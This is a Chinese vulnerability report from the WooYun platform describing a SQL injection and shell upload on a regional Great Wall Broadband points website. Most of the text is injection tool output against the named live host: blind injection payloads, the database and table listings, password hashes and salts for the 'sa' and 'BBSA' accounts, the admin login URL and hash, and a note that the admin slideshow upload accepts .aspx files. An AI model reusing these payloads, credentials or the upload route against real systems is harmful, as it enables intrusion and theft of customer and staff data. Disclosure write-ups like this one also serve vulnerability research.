[公开漏洞]某地区长城宽带SQL注入漏洞+getshell（详细过程与影响证明）

来源：WooYun　浏览：1334次　时间：2014-06-12

某地区长城宽带SQL注入漏洞+getshell（详细过程与影响证明）相关厂商：长城宽带漏洞作者：23号提交时间：2014-04-13 12:55 公开时间：2014-05-28 12:55 漏洞类型：SQL注射漏洞危害等级：高自评Rank：11 漏洞状态：已交由第三方厂商(cncert国家互联网应急中心)处理漏洞来源：http://www.wooyun.org Tags标签：数据库账户权限过高字符类型注射后台被猜解漏洞详情披露状态：

2014-04-13：细节已通知厂商并且等待厂商处理中
2014-04-18：厂商已经确认，细节仅向厂商公开
2014-04-28：细节向核心白帽子及相关领域专家公开
2014-05-08：细节向普通白帽子公开
2014-05-18：细节向实习白帽子公开
2014-05-28：细节向公众公开

简要描述：

注入漏洞已get shell

详细说明：

http://point.gzgwbn.net.cn/newsinfo.aspx?nid=72 注入点在这里

Place: GET

Parameter: nid

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: nid=72 AND 8365=8365



    Type: AND/OR time-based blind

    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)

    Payload: nid=-6303 OR 2019=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)

available databases [9]:

[*] Appreciation

[*] GZGWBN_Points

[*] GZGWBN_WPF

[*] GZGWBN_WPF1

[*] GZGWBN_WPF2

[*] master

[*] model

[*] msdb

[*] tempdb

9个库子

Database: GZGWBN_Points

[81 tables]

+--------------------------------+

| A111                           |

| A_2012_0507                    |

| AoYun2012_Answer               |

| AoYun2012_Answer_Bak           |

| AoYun2012_Result               |

| ApplyOTT                       |

| ApplySignUp                    |

| Bak_sys_custb                  |

| D99_Tmp                        |

| GZ_Lottery                     |

| GZ_Lottery_PlayNums            |

| GZ_Point_BatchDeal             |

| GZ_Point_V_Quantity_GoodsBook  |

| GZ_Summer_Lottery              |

| PackageSatisticsList           |

| ProductPayNum                  |

| Questionnaire                  |

| VPoint_Donation_Before_2006    |

| V_Commentary                   |

| V_CustomerPoint                |

| V_DealInfo                     |

| V_Deal_RowColumn               |

| V_GZ_Lottery                   |

| V_Goods_NowQuan                |

| V_Lottery_CountByDays          |

| V_Lottery_CountByGoods         |

| V_Lottery_CountBySH            |

| V_QuantityStatistics           |

| V_Quantity_Active_Book_GrowDay |

| V_Quantity_Active_SH           |

| V_Quantity_GoodsBook           |

| V_Summer_Lottery               |

| V_Summer_Lottery_CountByDays   |

| custbb                         |

| hd_ganentb                     |

| scoretbb                       |

| shop_basetb                    |

| shop_goodoneclasstb            |

| shop_goodstb                   |

| shop_goodtwoclasstb            |

| shop_helptb                    |

| shop_huantb                    |

| shop_nclasstb                  |

| shop_newstb                    |

| shop_notetb                    |

| shop_saytb                     |

| shop_scoretb                   |

| shop_selecttb                  |

| shop_usertb                    |

| sys_admintb                    |

| sys_biantb                     |

| sys_blackcustb                 |

| sys_caotb                      |

| sys_cuntb                      |

| sys_custb                      |

| sys_dealtb                     |

| sys_emailtb                    |

| sys_hourtb                     |

| sys_ozhantb                    |

| sys_protb                      |

| sys_qutb                       |

| sys_scoretb                    |

| sys_useremailtb                |

| sys_xingtb                     |

| sys_xitb                       |

| sys_yingtb                     |

| sys_zhantb                     |

| sys_zhantbbak                  |

| sys_zhetb                      |

| sysdiagrams                    |

| tEmailCount                    |

| tb_Luckydraw                   |

| tb_phoneActivate               |

| tb_sports_310                  |

| tb_sports_country              |

| tb_sports_help                 |

| tb_sports_main                 |

| tb_sports_mybet                |

| tb_sports_ssname               |

| tb_sports_user                 |

| vProductPayNum

挑了个库子跑表

别的库子里还有员工工资和银行卡号等信息，库实在太大了，跑的抗不住啊亲

还是SA权限

database management system users password hashes:

[*] BBSA [1]:

    password hash: 0x010011a6742cfce6ff23c521222535662f07ebfcc6d2322c6462

        header: 0x0100

        salt: 11a6742c

        mixedcase: fce6ff23c521222535662f07ebfcc6d2322c6462



[*] sa [1]:

    password hash: 0x01004086ceb665942725e30e13ba2f7425abeb2c1cd1612c7b3b

        header: 0x0100

        salt: 4086ceb6

        mixedcase: 65942725e30e13ba2f7425abeb2c1cd1612c7b3b

后台很好找：http://point.gzgwbn.net.cn/admin/login.aspx

跑表得出

+-----+----------------------------------+-------+

| uid | upwd                             | uname |

+-----+----------------------------------+-------+

| 1   | C922206634F4C33F728138ED57B6246B | admin |

| 4   | <blank>                          | NULL  |

+-----+----------------------------------+-------+

登录后台后发现FCKeditor上传，顿时死的心都有了，我白费劲了，但是发现此FCK上传不能利用，至少我这个彩笔是没那本事。。。

http://point.gzgwbn.net.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fpoint.gzgwbn.net.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx

愁苦中意外发现后台传幻灯片的地方可以直接上传.aspx 顿时艳阳高照啊！！